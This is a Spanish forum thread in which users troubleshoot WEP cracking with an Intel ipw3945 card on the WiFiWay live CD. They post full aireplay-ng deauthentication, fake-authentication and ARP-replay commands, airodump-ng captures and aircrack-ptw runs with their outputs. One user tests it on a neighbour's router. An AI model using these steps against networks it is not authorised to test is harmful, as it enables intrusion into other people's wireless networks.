Video + Manual: Inyeccion ipw3945

[naitse]

no me quedo muy claro... eh leido el enlace y el post de hwagm, pero no entendi tal ves como hacer para obterer el SSID :S... cuando lo probe en mi AP en un momento no lo veia pero de golpe aparecio el SSID que supuestamente deberia estar oculto, mi pregunta es si hay alguna manera de obtener o desocultar el SSID y no esperar a tener un golpe de suerte

[uNbAs]

con una desautentificacion, ya te he contestado en el otro hilo ... 

[antoniohuesas]

Hola a todos y enhorabuena por el curro y el aprendizaje de otros, buen equipo.
Oye tambien quiero haceros una pregunta, como puedo grabar el video de hadrianweb para verlo cuando esté en casa?

[guanchito03]

si tiens mozzilla bajate un plugin que hay para descargar videos, hasta lo podras hacer de youtube.
 Yo lo hice

[hadrianweb]

tambien puedes utilizar cualquier gestor de descargas y descargarlo al pc

[Tlacaelel]

HOLA MUCHO GUSTO. MI PREGUNTA ES LA SIGUIENTE:

EH VISTO EN SU PAGINA QUE SE PUEDE INYECTAR TRAFICO Y CAPTURAR CON LA TARJETA IPW3945 EH VISTO TAMBIEN QUE EN LA LISTA DE TARJETAS APARECE Y LA RECOMIENDAN MUCHO, ME GUSTARIA SABER DE ALGUIEN QUE HAYA INTENTADO EN INYECTANDO OH CAPTURANDO PAQUETES QUE TAN FUNCIONAL ES EN LA VELOCIDAD DE CAPTURA Y INYECCION. SE LOS AGRADECERIA MUCHO.ESPERO ME DISUCLPEN SI ACASO MOLESTE DE ALGUN MODO AL ESCRIBIR ESTAS LINEAS.

[Hwagm]

no molestan , pero para laproxima en minusculas por favor, en internet, escribir en mayusculas es como gritar, pero supongo eso no lo sabias

[KuaSha]

Hola.... quisiera preguntarte amigo hadrianweb sobre el tema del script, si es posible copiarlo o añadirlo a la iso y luego quemar la live d nuevo, para no tener q andar buscando el disco duro.

luego otra cosita, cuando se genera el archivo cap, éste se graba fisicamente en el disco duro, o el propio proceso lo lee automaticamente, o se tiene q ir a buscar al disco..... igual estoy diciendo una tonteria.

salu2.

[Hwagm]

Esa script ya la lleva la nueva wifiway-0.6.iso

Las capturas no se graban en el hdd, sino en memoria, a menos que las grabes en la partcion de windows o en un pendrive

[KuaSha]

Gracias Hwagm x responder.... entonces si no lo he entendido mal. cuando carga en modo terminal tipo windows, en una ventana escribo...

chmod 777 ipw3945
./ipw3945.sh

y entonces se carga la script.....no

[hadrianweb]

jeje, se supone que ya tienes los permisos, y ya esta en /bin o /sbin lo que significa que no es necesario tanto trabajo simplemente pon lo siguiente

Código:

ipw3945.sh

[KuaSha]

Me puede alguien indicar donde estal mal el proceso o q pueder ser el fallo. Despues d lanzar el script y poner los datos... este seria el orden.
>1terminal
canal = 6 , rate = 2 , bssid = mirouter

>2terminal
airodump-ng -w nombre rtp0 (corriendo)

>3terminal
aireplay-ng -3 -b mirouter -h portatil -x 1024 wifi0  (corriendo)
Esto sale : mas d 5 minutos
read 159513 packets ( got 97 ARP requests)
sent 130908 packets (69 pps)

>4terminal  (tambien lo he puesto  y quitado)
aireplay-ng -0 30 -a mirouter

>5terminal
aircrack-ptw nombre.cap
Esto sale :
Allocating a new table
bssid = mirouter     keyindex=0
stats for bssid mirouter    keyindex=0  packets=8
y nada mas...

luego veo q el archivo cap me lo pone él, con este nombre...
replay_arp-0524-200051.cap


salu2

[hadrianweb]

pues te falta el ataque 1 que es para asociarte al ap

[KuaSha]

a disculpa...t refieres a este :

aireplay-ng -1 0 -e DLINK -a mirouter -h portatil wifi0

esto tambien lo he echo.

[*dudux]

hadrian me ha gustado mucho el video................

mu bueno........


p.d. gracias por la dedicatoria...........

[hadrianweb]

a disculpa...t refieres a este :

aireplay-ng -1 0 -e DLINK -a mirouter -h portatil wifi0

esto tambien lo he echo.

Mira el problema ya se cual es, si te fijas te pone 97 arp request, y debes tener mas por lo que tienes que esperar mas, lo de los 5min depende de muchos factores, pero, a ti cuando te ponga 50000 datas puedes pararlo y mirar y si no te va con eses ivs pues pruebas con mas

[*dudux]

no hace falta pararlo...................sino luego toca usar emergecap

[hadrianweb]

Denada *dudux, es lo cierto, me habeis ayudado mucho, y por lo tanto queria agradeceroslo

[Southern]

Hola a todos, ante todo felicitarles por esta gran web

Estaba documentándome un poco sobre este tema y decidí probar probar este ataque contra el router de mis vecinos, que son amigos mios y por supuesto no hay problema 

La cosa es que cuando llego a la parte de ejecutar el aireplay para aumentar el tráfico, el programa rompe tal que así:

benihana:/home/javi#  aireplay-ng -3 -b 00:02:6F:31:2B:42 -h 00:30:CD:00:00:09 eth1

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211
or ARPHRD_IEEE80211_PRISM instead.  Make sure RFMON is enabled:
run 'ifconfig eth1 up; iwconfig eth1 mode Monitor channel <#>'
Sysfs injection support was not found either.

Hasta ahí supuse que sería algún problema de mi tarjeta respecto al tema de inyectar paquetes, por lo que decidí bajar el scrip de hadrianweb para mi intel pro wireless 3945ABG, pero la cosa es que mi tarjeta tiene como nombre de interfaz eth1 en vez de wifi0, por lo que traté de modificar el script sustituyendo wifi0 por eth1 en todas las instrucciones, lo que me devolvió los siguientes errores:

Por favor introduce el canal para la wifi0
2
Indique el rate de captura
2
Indique el bssid para el asociado, separado por puntos (Ej: 00:11:22:33:44:55)
00:30:CD:00:00:09
chmod: no se puede acceder a «/sys/class/net/eth1/device/rate»: No existe el fichero o el directorio
./ipw3945.sh: line 20: /sys/class/net/eth1/device/rate: Permiso denegado
./ipw3945.sh: line 21: /sys/class/net/eth1/device/channel: Permiso denegado
./ipw3945.sh: line 22: /sys/class/net/eth1/device/bssid: Permiso denegado

La cosa es que dichas carpetas o archivos no existen... ¿ Me falta algún paquete por instalar en mi sistema o algo así?

Muchas gracias de antemano por la ayuda ofrecida con este gran tutorial y por leer mis estúpidas preguntas xDD

Un saludo y nos leemos pronto!!! 

[chacki]

Hola amigos!!!

A mi tambien me da problemas es script.

Cuando lo ejecuto me dice que no encuentra los archivos rate, channel y bssid.

he mirado a ver si estan esos archivos y efectivamente no estan.

Dentro del directorio /sys/class/net/ tengo los directorios ath0, ath1, wifi0 y eth1 (es decir uno por interface)

Pues no encuentro esos archivos dentro de ninguna interfaz...

He probado a crearlos manualmente dentro de /sys/class/net/ath1/device y no hay manera, no me deja.

PD: uso la interfaz ath1 para sniffar, la creo con wlanconfig en modo monitor, es la unica manera que tengo de poner la tarjeta de red en modo monitor.

Alguien me puede ayudar??

Gracias.

[chacki]

Hola amigos!!!

A mi tambien me da problemas es script.

Cuando lo ejecuto me dice que no encuentra los archivos rate, channel y bssid.

he mirado a ver si estan esos archivos y efectivamente no estan.

Dentro del directorio /sys/class/net/ tengo los directorios ath0, ath1, wifi0 y eth1 (es decir uno por interface)

Pues no encuentro esos archivos dentro de ninguna interfaz...

He probado a crearlos manualmente dentro de /sys/class/net/ath1/device y no hay manera, no me deja.

PD: uso la interfaz ath1 para sniffar, la creo con wlanconfig en modo monitor, es la unica manera que tengo de poner la tarjeta de red en modo monitor.

Alguien me puede ayudar??

Gracias.

[chacki]

Hola Southern,
yo no se mucho pero...

me parece que para empezar estas utilizando la interfaz incorrecta no?

si haces un iwconfig a secas, te dice que eth1 es una interfaz wireless?

Normalmente esa es la ethernet.

PD: Perdon por duplicar el mensaje anterior.

[hadrianweb]

Chucki la interfaz que tienes que utilizar es rtap0 y wifi0 esta ultima para la inyeccion, y no la ath0 o ath1 como tu dices

[chacki]

Hola Hadrianweb,

la interfaz rtap0 no me sale, la wifi0 sí.

Pero el caso es que dentro del directorio /sys/class/net/wifi0/device   no tengo los archivos channel, bssid y rate.

Porque no los tengo??

[hadrianweb]

1º) Porque no tienes bien cargado el live cd, probable consecuencia de un mal grabado (lo mas seguro)

2º) Porque tienes desactivada la tarjeta wifi, es decir, dale al botoncito del portatil con el cual la activas

[KuaSha]

Hola.....disculpa hadrianweb pero he estado fuera y no he podido probar lo q me indicaste. Hoy he realizado las pruebas.....y como bien me digiste lo he dejado subir mas los ARP, y lo resultados siguen igual.

1ª Hora corriendo :

read 220.300 packets (got 155 ARP)  37 pps  (archivo.cap - 22 mb)

2ª Hora corriendo :

read 232.500 packets (got 162 ARP)  37 pps  (archivo.cap - 28 mb)

3ª Hora corriendo :

read 300.000 packets (got 175 ARP)   37 pps  (archivo.cap - 41 mb)

al lanzar el aircrack, lo unico q varia son los packets, lo demas esta todo igual.
1. 1900
2. 2474
3. 2597

Otra cosa queria preguntarte....al definir el archivo cap en el airodump hay q poner o es necesario el parametro IVS.

Luego en la carga del live aparece este error....

mount cánt  sys / etc / fsbab  or  etc / mtb            ( failed )

Puede estar relacionado ? q puede ser.

salu2.

[hadrianweb]

No el error ese que dices no se debe a eso.

Y se supone que lo estas haciendo bien, lo que ocurre es que no te inyecta muy rapido

[KuaSha]

ya...entonces, q significa y q puedo hacer para solucionarlo. Xq la tarjeta del portatil no creo q este mal, aún asi, hay alguna forma d realizarla algún tipo d test d verificación.

salu2.

[hadrianweb]

Una cosa es probable que no esteas bien auntentificado comprueba eso

[KuaSha]

perdoname hadrian.....pero estoy totalmente desorientado y confuso, ya no se q mas hacer. Me podrias indicar como hacerlo.

T agradezco d antemano tu preciada ayuda.

[hadrianweb]

Pues mira este es el comando

Código:

aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0

So te funciona debe de aparecete una cara asi :-) sino puede significar que el rate no estra cambiado o que estas muy lejos del ap, o que el router no es vulnerable a ese ataque ...etc

[KuaSha]

Hola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)

6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap

esto aparece
allocating a new table
bssid = xx:01  (mia)     keyindex=0
allocating a new table
bssid = xx:02               keyindex=0
allocating a new table
bssid = xx:03               keyindex=0
stats for bssid xx:01  keyindex =0 packects=1155
stats for bssid xx:02  keyindex =0 packects=34
stats for bssid xx:03  keyindex =0 packects=1

ahora el q me digsite tu...

aireplay-ng -1 30 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)
hora :sending keep alive packet
sending authentication request
sending authentication request
sending authentication request
sending authentication request

ahi se queda....... el Ap esta a unos 5 metros.

[hadrianweb]

como lo hacias esta correctoHola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)

6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap

esto aparece
allocating a new table
bssid = xx:01  (mia)     keyindex=0
allocating a new table
bssid = xx:02               keyindex=0
allocating a new table
bssid = xx:03               keyindex=0
stats for bssid xx:01  keyindex =0 packects=1155
stats for bssid xx:02  keyindex =0 packects=34
stats for bssid xx:03  keyindex =0 packects=1

Aparentemente esto esta correcto, solo comprueba una cosa, si hal cambiar el rate canal y demas estos estan cambiados correctamente

[mc_abel]

Antes que nada gracias a los que han puesto tiempo en darle soporte a wifi way wifislax y de alguna forma contribulleron a los manuales hallados en estos foros.

Los manuales estan muy buenos pero en mi caso ocurrio algo interesante que me hizo la vida imposible al intentar conseguir un WEP key:  no habian clientes conectados y aun con la falsa autenticacion no subian los ARP.  Pongo esto aqui por si alguien le ocurre lo mismo.  Lo que pongo a continuacion es una aplicacion/remix del conocimiento posteado aqui y otras web y para algunos os parecera obvio;  pero tiene algunos pasos extra para los que tengan mi problema de falta de injeccion.  Mi OS es WIN XP y uso live CD.  Asumo que el AP tiene WEP open y vosotros usuais tarjeta wifi ipw3945 :-P.

Primeramente, utilize la version 0.4 de wifiway.  la 0.6 salio JUSTO cuando acababa de bajar la 0.4 se me acabaron los discos en blanco para colmo>.>

NOTA:yo me mate buscando info por ahi y luego me entero que en esta live CD NO HAY QUE PONER LA TARJETA EN MODO MONITOR.  Se hace automaticamente.

En la version 0.6 imagino que los primeros 3 pasos no se necesitan(excepto poner el live cd DUH :-P).

I.  Desde windows correr netstumbler.  Es super rapido y dummy friendly para hallar AP's y BSSID's.  Es mi preferencia, si no os gusta usad lo que querais y pasad trabajo :-).

II.  Poner ipw3945.sh en el directorio raiz, usualmente C.  Poner live CD y dar restart.

III. Una vez en linux abrir el explorador de archivos y buscar el folder /mnt/ y una de esas va a ser la particion de windows.  Dar copy al ipw3945.sh y paste en /root.

->NOTA: talvez muchos sepan esto pero yo no hasta hace un dia, asi que aqui os va: en el folder /mnt/ pueden haber varias particiones (incluyendo USB drives me imagino). En mi caso puedo dar copy a cosas de windows pero no puedo paste cosas de linux a esa particion.  Si han comenzado el proceso de obtener IV's y se han quedado a mitad pueden darle copy a los .cap y .ivs y otras cosas que hayan creado en linux a uno de esas particiones.  Ademas pueden grabar desde windows los tutoriales con "save as web page," abrir firefox, arrastralos a la ventana y verlos desde linux.

IV.  Abrir un terminal y escribir chmod 777 ipw3945.sh <dar enter> luego escriba ./ipw3945.sh y ponga la info que le pida.



V.  Escriba en la consola:

Código:

aireplay-ng -1 0 -e NOMBRE_DEL_AP  -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wif